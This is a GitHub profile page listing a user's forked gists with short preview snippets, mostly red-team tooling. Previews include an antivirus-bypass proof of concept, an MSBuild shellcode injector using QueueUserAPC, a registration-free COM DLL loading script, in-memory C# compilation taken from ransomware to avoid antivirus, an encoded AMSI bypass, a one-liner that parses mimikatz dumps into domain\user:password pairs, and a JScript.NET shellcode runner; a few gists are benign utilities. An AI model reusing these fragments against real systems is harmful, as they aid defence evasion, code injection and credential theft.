Skip to content

Instantly share code, notes, and snippets.

View davehardy20's full-sized avatar

Dave Hardy davehardy20

101 followers · 286 following
  • UK
View GitHub Profile
@davehardy20
davehardy20 / DisplayImage.ps1
Created January 27, 2021 22:36 — forked from zippy1981/DisplayImage.ps1
Display an image from Windows Powershell
# Loosely based on http://www.vistax64.com/powershell/202216-display-image-powershell.html
[void][reflection.assembly]::LoadWithPartialName("System.Windows.Forms")
$file = (get-item 'C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg')
#$file = (get-item "c:\image.jpg")
$img = [System.Drawing.Image]::Fromfile($file);
# This tip from http://stackoverflow.com/questions/3358372/windows-forms-look-different-in-powershell-and-powershell-ise-why/3359274#3359274
@davehardy20
davehardy20 / divide_and_conquer.c
Created January 20, 2021 07:36 — forked from theevilbit/divide_and_conquer.c
Divide and Conquer NextGen AV bypass
/*
This is a POC for a generic technique I called internally on our red team assessment "Divide and Conquer", which can be used to bypass behavioral based NextGen AV detection. It works by splitting malicious actions and API calls into distinct processes.
*/
#include <stdio.h>
#include <tchar.h>
#include <windows.h>
#include "Commctrl.h"
#include <string>
@davehardy20
davehardy20 / msbuildQueueAPC.csproj
Created January 18, 2021 17:34 — forked from vector-sec/msbuildQueueAPC.csproj
MSBuild => CSC.exe Shellcode Inject using QueueUserAPC
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<-- x86 -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
<!- x64 -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
@davehardy20
davehardy20 / DllLoadAnythingViaScript
Created February 12, 2020 19:28 — forked from analyticsearch/DllLoadAnythingViaScript
DynamicWrapperX - Dropper , Registration-Free Execution
#Doesn't Even Have to Be A Conformant COM DLL To trigger the load.
# Sample DLL To inject here
# https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179
$manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="LiterallyDoesentMatter" version="6.6.6.0"/> <file name="Anyname.dll.anything"> <comClass description="Any Description HERE" clsid="{89565276-A714-4a43-91FE-EDACDCC0FFEE}" threadingModel="Both" progid="JustMakeSomethingUp"/> </file> </assembly>';
$ax = new-object -Com "Microsoft.Windows.ActCtx"
$ax.ManifestText = $manifest;
$DWX = $ax.CreateObject("JustMakeSomethingUp");
@davehardy20
davehardy20 / Get-Ticker.ps1
Created December 14, 2019 21:49 — forked from quonic/Get-Ticker.ps1
# Converted from bash to Powershell reference: https://github.com/alexanderepstein/Bash-Snippets/blob/master/stocks/stocks
function Get-Ticker([string]$CompanyName, [string]$Ticker) {
$Query = ""
if ($CompanyName) {
$Query = $CompanyName.Replace(' ', '+')
}
elseif ($Ticker) {
$Query = $Ticker.Replace(' ', '+')
}
@davehardy20
davehardy20 / README.md
Created August 17, 2019 22:01 — forked from jadonk/README.md
Installing mjpg-streamer
@davehardy20
davehardy20 / CompileInMemory.cs
Created August 13, 2019 08:31
Compile and run C# code in memory to avoid anti-virus. Taken from a C# ransomware sample: https://www.bleepingcomputer.com/news/security/new-c-ransomware-compiles-itself-at-runtime/ However, this will still execute csc.exe and drop a dll to %temp% https://twitter.com/Laughing_Mantis/status/991018563296157696
using System;
using System.Collections.Generic;
using System.Text;
using System.CodeDom.Compiler;
using Microsoft.CSharp;
using System.IO;
using System.Reflection;
namespace InMemoryCompiler
{
class Program
@davehardy20
davehardy20 / amsi-bypass.ps1
Created February 20, 2019 09:51 — forked from jkamdjou/amsi-bypass.ps1
$a = @(85,87,112,80,64,64,76,64,64,64,64,68,64,64,64,64,46,46,57,64,64,77,102,64,64,64,64,64,64,64,64,64,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,102,64,64,64,64,64,53,103,116,102,53,64,117,64,111,79,72,99,102,67,85,76,49,105,87,70,105,113,98,120,67,118,98,108,56,111,98,108,71,117,72,70,79,105,99,108,52,119,101,66,67,104,91,82,67,120,101,86,53,102,96,86,53,102,83,68,56,85,72,70,48,119,91,70,84,116,69,80,49,74,75,64,64,64,64,64,64,64,64,64,67,80,83,80,64,64,85,64,68,69,64,77,117,66,77,109,118,64,64,64,64,64,64,64,64,64,64,78,64,64,72,104,64,77,64,85,64,64,64,64,53,64,64,64,64,70,64,64,64,64,64,64,64,64,66,104,118,64,64,64,64,102,64,64,64,64,80,64,64,64,64,64,64,64,68,64,64,102,64,64,64,64,64,102,64,64,67,64,64,64,64,64,64,64,64,64,64,70,64,64,64,64,64,64,64,64,64,64,66,64,64,64,64,64,64,102,64,64,64,64,64,64,64,64,76,64,88,72,84,64,64,67,64,64,64,67,64,64,64,64,64,64,68,64,64,64,68,64,64,64,64,64,64,64,64,67,
@davehardy20
davehardy20 / One-liner Mimikatz Parser
Created July 16, 2019 19:59 — forked from Raikia/One-liner Mimikatz Parser
Assuming you have a mimikatz dump named "mimikatz_dump.txt", I made these bash one-liners that will reformat the mimikatz output to "domain\user:password"
First, before using these parsers, run: "dos2unix mimikatz_dump.txt"
Mimikatz 1.0:
cat mimikatz_dump.txt | grep -P '((Utilisateur principal)|(msv1_0)|(kerberos)|(ssp)|(wdigest)|(tspkg))\s+:\s+.+' | grep -v 'n\.' | sed -e 's/^\s\+[^:]*:\s\+//' | sed -e 's/Utilisateur principal\s\+:\s\+\(.*\)$/\n\1/' | sort -u
Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons):
@davehardy20
davehardy20 / shellcode.js
Created July 27, 2017 07:56
Execute ShellCode Via Jscript.NET
import System;
import System.Runtime.InteropServices;
import System.Reflection;
import System.Reflection.Emit;
import System.Runtime;
import System.Text;
//C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js